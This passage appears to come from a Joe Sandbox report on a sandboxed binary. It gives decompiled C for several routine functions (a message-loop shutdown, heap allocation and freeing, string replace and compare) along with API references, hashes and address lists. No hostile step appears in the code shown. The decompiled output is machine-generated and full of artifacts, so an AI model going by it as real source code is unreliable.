                                                                                                    APIs
                                                                                                    • _malloc.LIBCMT ref: 0043B70B
                                                                                                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00540000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                    • _free.LIBCMT ref: 0043B71E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap_free_malloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1020059152-0
                                                                                                    • Opcode ID: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
                                                                                                    • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                                                                                                    • Opcode Fuzzy Hash: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
                                                                                                    • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 100%
                                                                                                    			E0041F070() {
                                                                                                    				struct tagMSG _v32;
                                                                                                    				long _t7;
                                                                                                    
                                                                                                    				PostThreadMessageW( *0x51325c, 0x12, 0, 0);
                                                                                                    				do {
                                                                                                    					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
                                                                                                    						DispatchMessageW( &_v32);
                                                                                                    					}
                                                                                                    					_t7 = WaitForSingleObject( *0x513260, 0xa);
                                                                                                    				} while (_t7 == 0x102);
                                                                                                    				 *0x513260 = 0;
                                                                                                    				 *0x51325c = 0;
                                                                                                    				return _t7;
                                                                                                    			}





                                                                                                    0x0041f085
                                                                                                    0x0041f0a0
                                                                                                    0x0041f0b0
                                                                                                    0x0041f0b6
                                                                                                    0x0041f0c6
                                                                                                    0x0041f0d2
                                                                                                    0x0041f0d4
                                                                                                    0x0041f0dd
                                                                                                    0x0041f0e7
                                                                                                    0x0041f0f5

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 1380987712-0
                                                                                                    • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                    • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                                                                                                    • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                    • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 100%
                                                                                                    			E0041E500() {
                                                                                                    				struct tagMSG _v32;
                                                                                                    				long _t7;
                                                                                                    
                                                                                                    				PostThreadMessageW( *0x513258, 0x12, 0, 0);
                                                                                                    				do {
                                                                                                    					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
                                                                                                    						DispatchMessageW( &_v32);
                                                                                                    					}
                                                                                                    					_t7 = WaitForSingleObject( *0x513254, 0xa);
                                                                                                    				} while (_t7 == 0x102);
                                                                                                    				 *0x513254 = 0;
                                                                                                    				 *0x513258 = 0;
                                                                                                    				return _t7;
                                                                                                    			}





                                                                                                    0x0041e515
                                                                                                    0x0041e530
                                                                                                    0x0041e540
                                                                                                    0x0041e546
                                                                                                    0x0041e556
                                                                                                    0x0041e562
                                                                                                    0x0041e564
                                                                                                    0x0041e56d
                                                                                                    0x0041e577
                                                                                                    0x0041e585

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 1380987712-0
                                                                                                    • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                    • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                                                                                                    • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                    • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 100%
                                                                                                    			E0041FA40(long* __ecx) {
                                                                                                    				struct tagMSG _v32;
                                                                                                    				long _t9;
                                                                                                    				struct HWND__** _t14;
                                                                                                    
                                                                                                    				_t14 = __ecx;
                                                                                                    				PostThreadMessageW( *__ecx, 0x12, 0, 0);
                                                                                                    				do {
                                                                                                    					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
                                                                                                    						DispatchMessageW( &_v32);
                                                                                                    					}
                                                                                                    					_t9 = WaitForSingleObject(_t14[1], 0xa);
                                                                                                    				} while (_t9 == 0x102);
                                                                                                    				_t14[1] = 0;
                                                                                                    				 *_t14 = 0;
                                                                                                    				return _t9;
                                                                                                    			}






                                                                                                    0x0041fa4b
                                                                                                    0x0041fa53
                                                                                                    0x0041fa65
                                                                                                    0x0041fa75
                                                                                                    0x0041fa7b
                                                                                                    0x0041fa8b
                                                                                                    0x0041fa94
                                                                                                    0x0041fa9a
                                                                                                    0x0041faa3
                                                                                                    0x0041faaa
                                                                                                    0x0041fab4

                                                                                                    APIs
                                                                                                    • PostThreadMessageW.USER32 ref: 0041FA53
                                                                                                    • PeekMessageW.USER32 ref: 0041FA71
                                                                                                    • DispatchMessageW.USER32 ref: 0041FA7B
                                                                                                    • PeekMessageW.USER32 ref: 0041FA89
                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 1380987712-0
                                                                                                    • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                    • Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
                                                                                                    • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                    • Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 100%
                                                                                                    			E0041FDF0(long* __ecx) {
                                                                                                    				struct tagMSG _v32;
                                                                                                    				long _t9;
                                                                                                    				struct HWND__** _t14;
                                                                                                    
                                                                                                    				_t14 = __ecx;
                                                                                                    				PostThreadMessageW( *__ecx, 0x12, 0, 0);
                                                                                                    				do {
                                                                                                    					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
                                                                                                    						DispatchMessageW( &_v32);
                                                                                                    					}
                                                                                                    					_t9 = WaitForSingleObject(_t14[1], 0xa);
                                                                                                    				} while (_t9 == 0x102);
                                                                                                    				_t14[1] = 0;
                                                                                                    				 *_t14 = 0;
                                                                                                    				return _t9;
                                                                                                    			}






                                                                                                    0x0041fdfb
                                                                                                    0x0041fe03
                                                                                                    0x0041fe15
                                                                                                    0x0041fe25
                                                                                                    0x0041fe2b
                                                                                                    0x0041fe3b
                                                                                                    0x0041fe44
                                                                                                    0x0041fe4a
                                                                                                    0x0041fe53
                                                                                                    0x0041fe5a
                                                                                                    0x0041fe64

                                                                                                    APIs
                                                                                                    • PostThreadMessageW.USER32 ref: 0041FE03
                                                                                                    • PeekMessageW.USER32 ref: 0041FE21
                                                                                                    • DispatchMessageW.USER32 ref: 0041FE2B
                                                                                                    • PeekMessageW.USER32 ref: 0041FE39
                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 1380987712-0
                                                                                                    • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                    • Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
                                                                                                    • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                    • Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 69%
                                                                                                    			E00417BA0(signed int __ebx, signed int __ecx, signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
                                                                                                    				signed int _v0;
                                                                                                    				signed int _v8;
                                                                                                    				signed int _v12;
                                                                                                    				signed int _v16;
                                                                                                    				intOrPtr _v44;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				void* __ebp;
                                                                                                    				signed int _t101;
                                                                                                    				signed int _t104;
                                                                                                    				signed int _t107;
                                                                                                    				signed int _t109;
                                                                                                    				signed int _t111;
                                                                                                    				signed int _t113;
                                                                                                    				signed int _t116;
                                                                                                    				intOrPtr _t122;
                                                                                                    				intOrPtr _t128;
                                                                                                    				intOrPtr* _t136;
                                                                                                    				signed int _t137;
                                                                                                    				intOrPtr* _t139;
                                                                                                    				signed int _t146;
                                                                                                    				intOrPtr _t154;
                                                                                                    				signed int _t155;
                                                                                                    				intOrPtr _t162;
                                                                                                    				signed int _t171;
                                                                                                    				signed int _t174;
                                                                                                    				signed int _t176;
                                                                                                    				signed int _t177;
                                                                                                    				signed int _t180;
                                                                                                    				intOrPtr* _t186;
                                                                                                    				signed int _t187;
                                                                                                    				signed int _t191;
                                                                                                    				intOrPtr _t196;
                                                                                                    				signed int _t199;
                                                                                                    				signed int _t200;
                                                                                                    				intOrPtr _t204;
                                                                                                    				signed int _t206;
                                                                                                    				intOrPtr* _t207;
                                                                                                    				void* _t209;
                                                                                                    				signed int _t210;
                                                                                                    				intOrPtr* _t211;
                                                                                                    				intOrPtr* _t212;
                                                                                                    				intOrPtr* _t215;
                                                                                                    				void* _t217;
                                                                                                    				signed int _t218;
                                                                                                    				signed int _t219;
                                                                                                    				signed int _t221;
                                                                                                    				signed int _t222;
                                                                                                    				intOrPtr _t223;
                                                                                                    				void* _t224;
                                                                                                    				signed int _t233;
                                                                                                    				signed int _t238;
                                                                                                    				intOrPtr* _t239;
                                                                                                    				signed int _t241;
                                                                                                    				void* _t250;
                                                                                                    				void* _t252;
                                                                                                    				void* _t253;
                                                                                                    
                                                                                                    				_t176 = __ebx;
                                                                                                    				_push(__ecx);
                                                                                                    				_t206 = _a12;
                                                                                                    				_t238 = __ecx;
                                                                                                    				_push(_t221);
                                                                                                    				if(_t206 == 0) {
                                                                                                    					L13:
                                                                                                    					_t186 =  *((intOrPtr*)(_t238 + 0x10));
                                                                                                    					_t101 = _a4;
                                                                                                    					__eflags = _t186 - _t101;
                                                                                                    					if(__eflags < 0) {
                                                                                                    						_push("invalid string position");
                                                                                                    						E0044F26C(__eflags);
                                                                                                    						goto L46;
                                                                                                    					} else {
                                                                                                    						_t233 = _a8;
                                                                                                    						_t217 = _t186 - _t101;
                                                                                                    						__eflags = _t217 - _t233;
                                                                                                    						_push(_t176);
                                                                                                    						_t176 = _a16;
                                                                                                    						_t221 =  <  ? _t217 : _t233;
                                                                                                    						_t186 = _t186 - _t221;
                                                                                                    						__eflags = (_t101 | 0xffffffff) - _t176 - _t186;
                                                                                                    						if(__eflags <= 0) {
                                                                                                    							L46:
                                                                                                    							_push("string too long");
                                                                                                    							E0044F23E(__eflags);
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							_t250 = _t252;
                                                                                                    							_t253 = _t252 - 8;
                                                                                                    							_push(_t238);
                                                                                                    							_push(_t221);
                                                                                                    							_t222 = _v12;
                                                                                                    							_t239 = _t186;
                                                                                                    							__eflags = _t222;
                                                                                                    							if(_t222 == 0) {
                                                                                                    								L60:
                                                                                                    								_t104 =  *(_t239 + 0x10);
                                                                                                    								_t187 = _v0;
                                                                                                    								__eflags = _t104 - _t187;
                                                                                                    								if(__eflags < 0) {
                                                                                                    									_push("invalid string position");
                                                                                                    									E0044F26C(__eflags);
                                                                                                    									goto L91;
                                                                                                    								} else {
                                                                                                    									_t209 = _t104 - _t187;
                                                                                                    									_t187 = _a12;
                                                                                                    									_push(_t176);
                                                                                                    									_t180 = _a4;
                                                                                                    									__eflags = _t209 - _t180;
                                                                                                    									_t176 =  <  ? _t209 : _t180;
                                                                                                    									_t113 = _t104 - _t176;
                                                                                                    									_a4 = _t113;
                                                                                                    									__eflags = (_t113 | 0xffffffff) - _t187 - _a4;
                                                                                                    									if(__eflags <= 0) {
                                                                                                    										L91:
                                                                                                    										_push("string too long");
                                                                                                    										E0044F23E(__eflags);
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										_push(_t250);
                                                                                                    										_push(_t176);
                                                                                                    										_push(_t239);
                                                                                                    										_push(_t222);
                                                                                                    										_t223 = _v44;
                                                                                                    										__eflags =  *((intOrPtr*)(_t187 + 0x10)) - _t223;
                                                                                                    										_t224 =  <  ?  *((void*)(_t187 + 0x10)) : _t223;
                                                                                                    										__eflags =  *((intOrPtr*)(_t187 + 0x14)) - 8;
                                                                                                    										if( *((intOrPtr*)(_t187 + 0x14)) >= 8) {
                                                                                                    											_t187 =  *_t187;
                                                                                                    										}
                                                                                                    										_t177 = _a8;
                                                                                                    										__eflags = _t224 - _t177;
                                                                                                    										_t241 =  <  ? _t224 : _t177;
                                                                                                    										__eflags = _t241;
                                                                                                    										if(_t241 == 0) {
                                                                                                    											L98:
                                                                                                    											_t107 = 0;
                                                                                                    											__eflags = 0;
                                                                                                    										} else {
                                                                                                    											_t207 = _a4;
                                                                                                    											while(1) {
                                                                                                    												__eflags =  *_t187 -  *_t207;
                                                                                                    												if( *_t187 !=  *_t207) {
                                                                                                    													break;
                                                                                                    												}
                                                                                                    												_t187 = _t187 + 2;
                                                                                                    												_t207 = _t207 + 2;
                                                                                                    												_t241 = _t241 - 1;
                                                                                                    												__eflags = _t241;
                                                                                                    												if(_t241 != 0) {
                                                                                                    													continue;
                                                                                                    												} else {
                                                                                                    													goto L98;
                                                                                                    												}
                                                                                                    												goto L99;
                                                                                                    											}
                                                                                                    											_t111 =  *_t187 & 0x0000ffff;
                                                                                                    											__eflags = _t111 -  *_t207;
                                                                                                    											asm("sbb eax, eax");
                                                                                                    											_t107 = (_t111 & 0xfffffffe) + 1;
                                                                                                    										}
                                                                                                    										L99:
                                                                                                    										__eflags = _t107;
                                                                                                    										if(_t107 != 0) {
                                                                                                    											L104:
                                                                                                    											return _t107;
                                                                                                    										} else {
                                                                                                    											__eflags = _t224 - _t177;
                                                                                                    											if(_t224 >= _t177) {
                                                                                                    												__eflags = _t224 - _t177;
                                                                                                    												_t100 = _t224 != _t177;
                                                                                                    												__eflags = _t100;
                                                                                                    												_t107 = 0 | _t100;
                                                                                                    												goto L104;
                                                                                                    											} else {
                                                                                                    												_t109 = _t107 | 0xffffffff;
                                                                                                    												__eflags = _t109;
                                                                                                    												return _t109;
                                                                                                    											}
                                                                                                    										}
                                                                                                    									} else {
                                                                                                    										_t210 = _t209 - _t176;
                                                                                                    										_v16 = _t210;
                                                                                                    										__eflags = _t187 - _t176;
                                                                                                    										if(_t187 < _t176) {
                                                                                                    											_t128 =  *((intOrPtr*)(_t239 + 0x14));
                                                                                                    											__eflags = _t128 - 8;
                                                                                                    											if(_t128 < 8) {
                                                                                                    												_a4 = _t239;
                                                                                                    											} else {
                                                                                                    												_a4 =  *_t239;
                                                                                                    												_t222 = _a8;
                                                                                                    											}
                                                                                                    											__eflags = _t128 - 8;
                                                                                                    											if(_t128 < 8) {
                                                                                                    												_v12 = _t239;
                                                                                                    											} else {
                                                                                                    												_v12 =  *_t239;
                                                                                                    											}
                                                                                                    											__eflags = _t210;
                                                                                                    											if(_t210 != 0) {
                                                                                                    												E004205A0(_v12 + (_v0 + _t187) * 2, _a4 + (_v0 + _t176) * 2, _t210 + _t210);
                                                                                                    												_t222 = _a8;
                                                                                                    												_t253 = _t253 + 0xc;
                                                                                                    												_t187 = _a12;
                                                                                                    											}
                                                                                                    										}
                                                                                                    										__eflags = _t187;
                                                                                                    										if(_t187 != 0) {
                                                                                                    											L73:
                                                                                                    											_a4 = _t187 - _t176 +  *(_t239 + 0x10);
                                                                                                    											_t116 = E00415D50(_t176, _t239, _t222, _t239, _t187 - _t176 +  *(_t239 + 0x10), 0);
                                                                                                    											__eflags = _t116;
                                                                                                    											if(_t116 != 0) {
                                                                                                    												_t191 = _a12;
                                                                                                    												__eflags = _t176 - _t191;
                                                                                                    												if(_t176 >= _t191) {
                                                                                                    													_t182 = _v0;
                                                                                                    												} else {
                                                                                                    													_t122 =  *((intOrPtr*)(_t239 + 0x14));
                                                                                                    													__eflags = _t122 - 8;
                                                                                                    													if(_t122 < 8) {
                                                                                                    														_t212 = _t239;
                                                                                                    													} else {
                                                                                                    														_t212 =  *_t239;
                                                                                                    													}
                                                                                                    													__eflags = _t122 - 8;
                                                                                                    													if(_t122 < 8) {
                                                                                                    														_a8 = _t239;
                                                                                                    													} else {
                                                                                                    														_a8 =  *_t239;
                                                                                                    													}
                                                                                                    													_t182 = _v0;
                                                                                                    													E0040B600(_a8 + (_v0 + _t191) * 2, _t212 + (_v0 + _t176) * 2, _v16);
                                                                                                    													_t191 = _a12;
                                                                                                    													_t253 = _t253 + 4;
                                                                                                    												}
                                                                                                    												__eflags =  *((intOrPtr*)(_t239 + 0x14)) - 8;
                                                                                                    												if( *((intOrPtr*)(_t239 + 0x14)) < 8) {
                                                                                                    													_t211 = _t239;
                                                                                                    												} else {
                                                                                                    													_t211 =  *_t239;
                                                                                                    												}
                                                                                                    												__eflags = _t191;
                                                                                                    												if(_t191 != 0) {
                                                                                                    													E0042D8D0(_t211 + _t182 * 2, _t222, _t191 + _t191);
                                                                                                    												}
                                                                                                    												E00414DF0(_t239, _a4);
                                                                                                    											}
                                                                                                    										} else {
                                                                                                    											__eflags = _t176;
                                                                                                    											if(_t176 != 0) {
                                                                                                    												goto L73;
                                                                                                    											}
                                                                                                    										}
                                                                                                    										return _t239;
                                                                                                    									}
                                                                                                    								}
                                                                                                    							} else {
                                                                                                    								_t196 =  *((intOrPtr*)(_t239 + 0x14));
                                                                                                    								__eflags = _t196 - 8;
                                                                                                    								if(_t196 < 8) {
                                                                                                    									_t136 = _t239;
                                                                                                    								} else {
                                                                                                    									_t136 =  *_t239;
                                                                                                    								}
                                                                                                    								__eflags = _t222 - _t136;
                                                                                                    								if(_t222 < _t136) {
                                                                                                    									goto L60;
                                                                                                    								} else {
                                                                                                    									__eflags = _t196 - 8;
                                                                                                    									if(_t196 < 8) {
                                                                                                    										_t215 = _t239;
                                                                                                    									} else {
                                                                                                    										_t215 =  *_t239;
                                                                                                    									}
                                                                                                    									_t137 =  *(_t239 + 0x10);
                                                                                                    									__eflags = _t215 + _t137 * 2 - _t222;
                                                                                                    									if(_t215 + _t137 * 2 <= _t222) {
                                                                                                    										goto L60;
                                                                                                    									} else {
                                                                                                    										__eflags = _t196 - 8;
                                                                                                    										if(_t196 < 8) {
                                                                                                    											_t139 = _t239;
                                                                                                    										} else {
                                                                                                    											_t139 =  *_t239;
                                                                                                    										}
                                                                                                    										__eflags = _t222 - _t139;
                                                                                                    										return E00414920(_t176, _t239, _t222 - _t139 >> 1, _t239, _v0, _a4, _t239, _t222 - _t139 >> 1, _a12);
                                                                                                    									}
                                                                                                    								}
                                                                                                    							}
                                                                                                    						} else {
                                                                                                    							_t218 = _t217 - _t221;
                                                                                                    							_v8 = _t218;
                                                                                                    							__eflags = _t176 - _t221;
                                                                                                    							if(_t176 < _t221) {
                                                                                                    								_t162 =  *((intOrPtr*)(_t238 + 0x14));
                                                                                                    								__eflags = _t162 - 0x10;
                                                                                                    								if(_t162 < 0x10) {
                                                                                                    									_a8 = _t238;
                                                                                                    								} else {
                                                                                                    									_a8 =  *_t238;
                                                                                                    								}
                                                                                                    								__eflags = _t162 - 0x10;
                                                                                                    								if(_t162 < 0x10) {
                                                                                                    									_a16 = _t238;
                                                                                                    								} else {
                                                                                                    									_a16 =  *_t238;
                                                                                                    								}
                                                                                                    								__eflags = _t218;
                                                                                                    								if(_t218 != 0) {
                                                                                                    									__eflags = _a16 + _a4 + _t176;
                                                                                                    									E004205A0(_a16 + _a4 + _t176, _a8 + _a4 + _t221, _t218);
                                                                                                    									_t252 = _t252 + 0xc;
                                                                                                    								}
                                                                                                    							}
                                                                                                    							__eflags = _t176;
                                                                                                    							if(_t176 != 0) {
                                                                                                    								L26:
                                                                                                    								_push(0);
                                                                                                    								_a16 = _t176 - _t221 +  *((intOrPtr*)(_t238 + 0x10));
                                                                                                    								_t146 = E00415810(_t176, _t238, _t221, _t176 - _t221 +  *((intOrPtr*)(_t238 + 0x10)));
                                                                                                    								__eflags = _t146;
                                                                                                    								if(_t146 == 0) {
                                                                                                    									goto L44;
                                                                                                    								} else {
                                                                                                    									__eflags = _t221 - _t176;
                                                                                                    									if(_t221 < _t176) {
                                                                                                    										_t154 =  *((intOrPtr*)(_t238 + 0x14));
                                                                                                    										__eflags = _t154 - 0x10;
                                                                                                    										if(_t154 < 0x10) {
                                                                                                    											_a8 = _t238;
                                                                                                    										} else {
                                                                                                    											_a8 =  *_t238;
                                                                                                    										}
                                                                                                    										__eflags = _t154 - 0x10;
                                                                                                    										if(_t154 < 0x10) {
                                                                                                    											_t219 = _t238;
                                                                                                    										} else {
                                                                                                    											_t219 =  *_t238;
                                                                                                    										}
                                                                                                    										_t155 = _v8;
                                                                                                    										__eflags = _t155;
                                                                                                    										if(_t155 != 0) {
                                                                                                    											__eflags = _t219 + _a4 + _t176;
                                                                                                    											E004205A0(_t219 + _a4 + _t176, _a8 + _a4 + _t221, _t155);
                                                                                                    											_t252 = _t252 + 0xc;
                                                                                                    										}
                                                                                                    									}
                                                                                                    									__eflags =  *((intOrPtr*)(_t238 + 0x14)) - 0x10;
                                                                                                    									if( *((intOrPtr*)(_t238 + 0x14)) < 0x10) {
                                                                                                    										_t199 = _t238;
                                                                                                    									} else {
                                                                                                    										_t199 =  *_t238;
                                                                                                    									}
                                                                                                    									__eflags = _t176;
                                                                                                    									if(_t176 != 0) {
                                                                                                    										__eflags = _a4 + _t199;
                                                                                                    										E0042D8D0(_a4 + _t199, _a12, _t176);
                                                                                                    									}
                                                                                                    									__eflags =  *((intOrPtr*)(_t238 + 0x14)) - 0x10;
                                                                                                    									_t200 = _a16;
                                                                                                    									 *((intOrPtr*)(_t238 + 0x10)) = _t200;
                                                                                                    									if( *((intOrPtr*)(_t238 + 0x14)) < 0x10) {
                                                                                                    										 *((char*)(_t238 + _t200)) = 0;
                                                                                                    										goto L44;
                                                                                                    									} else {
                                                                                                    										 *((char*)( *_t238 + _t200)) = 0;
                                                                                                    										return _t238;
                                                                                                    									}
                                                                                                    								}
                                                                                                    							} else {
                                                                                                    								__eflags = _t221;
                                                                                                    								if(_t221 == 0) {
                                                                                                    									L44:
                                                                                                    									return _t238;
                                                                                                    								} else {
                                                                                                    									goto L26;
                                                                                                    								}
                                                                                                    							}
                                                                                                    						}
                                                                                                    					}
                                                                                                    				} else {
                                                                                                    					_t204 =  *((intOrPtr*)(__ecx + 0x14));
                                                                                                    					if(_t204 < 0x10) {
                                                                                                    						_t171 = __ecx;
                                                                                                    					} else {
                                                                                                    						_t171 =  *((intOrPtr*)(__ecx));
                                                                                                    					}
                                                                                                    					if(_t206 < _t171) {
                                                                                                    						goto L13;
                                                                                                    					} else {
                                                                                                    						if(_t204 < 0x10) {
                                                                                                    							_t221 = _t238;
                                                                                                    						} else {
                                                                                                    							_t221 =  *_t238;
                                                                                                    						}
                                                                                                    						if( *((intOrPtr*)(_t238 + 0x10)) + _t221 <= _t206) {
                                                                                                    							goto L13;
                                                                                                    						} else {
                                                                                                    							if(_t204 < 0x10) {
                                                                                                    								_t174 = _t238;
                                                                                                    							} else {
                                                                                                    								_t174 =  *_t238;
                                                                                                    							}
                                                                                                    							return E00418000(_t176, _t238, _t221, _t238, _a4, _a8, _t238, _t206 - _t174, _a16);
                                                                                                    						}
                                                                                                    					}
                                                                                                    				}
                                                                                                    			}




























































                                                                                                    0x00417ba0
                                                                                                    0x00417ba3
                                                                                                    0x00417ba4
                                                                                                    0x00417ba8
                                                                                                    0x00417baa
                                                                                                    0x00417bad
                                                                                                    0x00417bfc
                                                                                                    0x00417bfc
                                                                                                    0x00417bff
                                                                                                    0x00417c02
                                                                                                    0x00417c04
                                                                                                    0x00417d2c
                                                                                                    0x00417d31
                                                                                                    0x00000000
                                                                                                    0x00417c0a
                                                                                                    0x00417c0a
                                                                                                    0x00417c0f
                                                                                                    0x00417c11
                                                                                                    0x00417c13
                                                                                                    0x00417c14
                                                                                                    0x00417c17
                                                                                                    0x00417c1d
                                                                                                    0x00417c21
                                                                                                    0x00417c23
                                                                                                    0x00417d36
                                                                                                    0x00417d36
                                                                                                    0x00417d3b
                                                                                                    0x00417d40
                                                                                                    0x00417d41
                                                                                                    0x00417d42
                                                                                                    0x00417d43
                                                                                                    0x00417d44
                                                                                                    0x00417d45
                                                                                                    0x00417d46
                                                                                                    0x00417d47
                                                                                                    0x00417d48
                                                                                                    0x00417d49
                                                                                                    0x00417d4a
                                                                                                    0x00417d4b
                                                                                                    0x00417d4c
                                                                                                    0x00417d4d
                                                                                                    0x00417d4e
                                                                                                    0x00417d4f
                                                                                                    0x00417d51
                                                                                                    0x00417d53
                                                                                                    0x00417d56
                                                                                                    0x00417d57
                                                                                                    0x00417d58
                                                                                                    0x00417d5b
                                                                                                    0x00417d5d
                                                                                                    0x00417d5f
                                                                                                    0x00417db1
                                                                                                    0x00417db1
                                                                                                    0x00417db4
                                                                                                    0x00417db7
